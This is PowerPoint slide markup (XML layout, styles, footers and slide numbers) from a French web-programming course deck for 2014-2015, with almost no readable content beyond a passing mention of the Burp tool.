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50" r:id="rId1"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId53"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId54"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="378" r:id="rId2"/>
    <p:sldId id="379" r:id="rId3"/>
    <p:sldId id="431" r:id="rId4"/>
    <p:sldId id="446" r:id="rId5"/>
    <p:sldId id="414" r:id="rId6"/>
    <p:sldId id="432" r:id="rId7"/>
    <p:sldId id="447" r:id="rId8"/>
    <p:sldId id="398" r:id="rId9"/>
    <p:sldId id="436" r:id="rId10"/>
    <p:sldId id="391" r:id="rId11"/>
    <p:sldId id="389" r:id="rId12"/>
    <p:sldId id="400" r:id="rId13"/>
    <p:sldId id="401" r:id="rId14"/>
    <p:sldId id="437" r:id="rId15"/>
    <p:sldId id="438" r:id="rId16"/>
    <p:sldId id="390" r:id="rId17"/>
    <p:sldId id="392" r:id="rId18"/>
    <p:sldId id="402" r:id="rId19"/>
    <p:sldId id="404" r:id="rId20"/>
    <p:sldId id="393" r:id="rId21"/>
    <p:sldId id="406" r:id="rId22"/>
    <p:sldId id="407" r:id="rId23"/>
    <p:sldId id="408" r:id="rId24"/>
    <p:sldId id="394" r:id="rId25"/>
    <p:sldId id="412" r:id="rId26"/>
    <p:sldId id="413" r:id="rId27"/>
    <p:sldId id="416" r:id="rId28"/>
    <p:sldId id="395" r:id="rId29"/>
    <p:sldId id="428" r:id="rId30"/>
    <p:sldId id="418" r:id="rId31"/>
    <p:sldId id="419" r:id="rId32"/>
    <p:sldId id="420" r:id="rId33"/>
    <p:sldId id="421" r:id="rId34"/>
    <p:sldId id="422" r:id="rId35"/>
    <p:sldId id="423" r:id="rId36"/>
    <p:sldId id="424" r:id="rId37"/>
    <p:sldId id="425" r:id="rId38"/>
    <p:sldId id="417" r:id="rId39"/>
    <p:sldId id="397" r:id="rId40"/>
    <p:sldId id="439" r:id="rId41"/>
    <p:sldId id="440" r:id="rId42"/>
    <p:sldId id="441" r:id="rId43"/>
    <p:sldId id="429" r:id="rId44"/>
    <p:sldId id="427" r:id="rId45"/>
    <p:sldId id="433" r:id="rId46"/>
    <p:sldId id="434" r:id="rId47"/>
    <p:sldId id="435" r:id="rId48"/>
    <p:sldId id="443" r:id="rId49"/>
    <p:sldId id="445" r:id="rId50"/>
    <p:sldId id="444" r:id="rId51"/>
    <p:sldId id="430" r:id="rId52"/>
  </p:sldIdLst>
  <p:sldSz cx="9144000" cy="6858000" type="screen4x3"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:defaultTextStyle>
    <a:defPPr>
      <a:defRPr lang="en-US"/>
    </a:defPPr>
    <a:lvl1pPr algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
      <a:spcBef>
        <a:spcPct val="0"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>
      <a:defRPr sz="2000" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Arial" charset="0"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl1pPr>
    <a:lvl2pPr marL="457200" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
      <a:spcBef>
        <a:spcPct val="0"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>
      <a:defRPr sz="2000" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Arial" charset="0"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl2pPr>
    <a:lvl3pPr marL="914400" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
      <a:spcBef>
        <a:spcPct val="0"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>
      <a:defRPr sz="2000" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Arial" charset="0"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl3pPr>
    <a:lvl4pPr marL="1371600" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
      <a:spcBef>
        <a:spcPct val="0"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>
      <a:defRPr sz="2000" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Arial" charset="0"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl4pPr>
    <a:lvl5pPr marL="1828800" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
      <a:spcBef>
        <a:spcPct val="0"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>
      <a:defRPr sz="2000" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Arial" charset="0"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl5pPr>
    <a:lvl6pPr marL="2286000" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr sz="2000" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Arial" charset="0"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl6pPr>
    <a:lvl7pPr marL="2743200" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr sz="2000" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Arial" charset="0"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl7pPr>
    <a:lvl8pPr marL="3200400" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr sz="2000" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Arial" charset="0"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl8pPr>
    <a:lvl9pPr marL="3657600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr sz="2000"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FF"/>
    <a:srgbClr val="0000FF"/>
    <a:srgbClr val="CCCCFF"/>
    <a:srgbClr val="9966FF"/>
    <a:srgbClr val="000000"/>
    <a:srgbClr val="339966"/>
    <a:srgbClr val="006600"/>
    <a:srgbClr val="FF00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62" autoAdjust="0"/>
    <p:restoredTop sz="75287" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr>
        <p:scale>
          <a:sx n="70" d="100"/>
          <a:sy n="70" d="100"/>
        </p:scale>
        <p:origin x="-2730" y="-372"/>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notesViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="55" d="100"/>
          <a:sy n="55" d="100"/>
        </p:scale>
        <p:origin x="-289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92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a:latin typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="139267"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fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="139268"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a:latin typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="139269"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9FDC3B83-EEF8-4D98-BC5A-A1B693BB7896}" type="slidenum">
              <a:rPr lang="fr-FR" altLang="fr-FR"/>
              <a:pPr/>
              <a:t>‹N°›</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" altLang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns="" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35517306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697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a:latin typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12697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fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1024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2698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12698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a:latin typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12698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A8B630A9-12BB-4FC0-824B-A41C68FA6EEC}" type="slidenum">
              <a:rPr lang="fr-FR" altLang="fr-FR"/>
              <a:pPr/>
              <a:t>‹N°›</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" altLang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns="" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1649895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B8487A2-BDF4-4AE0-975A-A254890D2314}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>1</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns="" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12769734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B8487A2-BDF4-4AE0-975A-A254890D2314}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>2</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns="" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34403702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a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé du numéro de diapositive 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A8B630A9-12BB-4FC0-824B-A41C68FA6EEC}" type="slidenum">
              <a:rPr lang="fr-FR" altLang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>20</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" altLang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns="" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7139416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A8B630A9-12BB-4FC0-824B-A41C68FA6EEC}" type="slidenum">
              <a:rPr lang="fr-FR" altLang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>25</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" altLang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns="" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39086380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8B630A9-12BB-4FC0-824B-A41C68FA6EEC}" type="slidenum">
              <a:rPr lang="fr-FR" altLang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>33</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" altLang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns="" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23966633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171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé du numéro de diapositive 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A8B630A9-12BB-4FC0-824B-A41C68FA6EEC}" type="slidenum">
              <a:rPr lang="fr-FR" altLang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>35</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" altLang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns="" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39114589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err="1" smtClean="0"/>
              <a:t>Burp</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé du numéro de diapositive 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A8B630A9-12BB-4FC0-824B-A41C68FA6EEC}" type="slidenum">
              <a:rPr lang="fr-FR" altLang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>50</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" altLang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns="" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40599405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pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{93225CD9-B4B6-4455-849F-53F54B002E2A}" type="datetime11">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>00:09:16</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Espace réservé du pied de page 18"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>Programmation Web 2014-2015</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Espace réservé du numéro de diapositive 26"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{296E7C53-C2FB-42E1-9213-E24448BF082A}" type="slidenum">
              <a:rPr lang="fr-FR" altLang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>‹N°›</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" alt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pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{5E47E65D-482A-4436-9DD3-15BB8ED61452}" type="datetime11">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>00:09:17</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Espace réservé du pied de page 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>Programmation Web 2014-2015</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Espace réservé du numéro de diapositive 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{6FB19791-0DEE-4EF3-9BC3-BB633FEEE66D}" type="slidenum">
              <a:rPr lang="fr-FR" altLang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>‹N°›</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" alt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pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{388583AA-E3FD-44CB-8F1C-1E7BE92C20C0}" type="datetime11">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>00:09:17</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Espace réservé du pied de page 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>Programmation Web 2014-2015</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Espace réservé du numéro de diapositive 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{E0F16710-1BC0-4714-8190-838D9253E1C5}" type="slidenum">
              <a:rPr lang="fr-FR" altLang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>‹N°›</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" alt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pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{00399EDD-1035-4F09-8CFE-9DCE77BD2F4A}" type="datetime11">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>00:09:16</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Espace réservé du pied de page 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>Programmation Web 2014-2015</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Espace réservé du numéro de diapositive 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C4DF6A13-7182-457A-9CB4-1842CEE646A8}" type="slidenum">
              <a:rPr lang="fr-FR" altLang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>‹N°›</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" alt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pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{604BA230-9B0D-4004-B1FF-3118839721D6}" type="datetime11">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>00:09:16</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Espace réservé du pied de page 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>Programmation Web 2014-2015</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Espace réservé du numéro de diapositive 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F1DB18D8-665F-4365-B89F-A7E9CA04F82A}" type="slidenum">
              <a:rPr lang="fr-FR" altLang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>‹N°›</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" alt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pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{A09092CB-9323-4F4F-ACEE-362DCE827DC4}" type="datetime11">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>00:09:16</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Espace réservé du pied de page 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>Programmation Web 2014-2015</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Espace réservé du numéro de diapositive 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A04AA805-5E09-4AF5-B48F-A3019B00F9F2}" type="slidenum">
              <a:rPr lang="fr-FR" altLang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>‹N°›</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" alt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pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{FF3FC528-CD97-4234-8398-8BB0A7DE7860}" type="datetime11">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>00:09:16</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Espace réservé du pied de page 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>Programmation Web 2014-2015</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Espace réservé du numéro de diapositive 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{184E44C5-4DB6-4ACB-AED4-C87F45369AA1}" type="slidenum">
              <a:rPr lang="fr-FR" altLang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>‹N°›</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" alt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pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{6E46588F-789E-4FB7-93F4-59FB8D92C701}" type="datetime11">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>00:09:16</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé du pied de page 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>Programmation Web 2014-2015</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR"/>
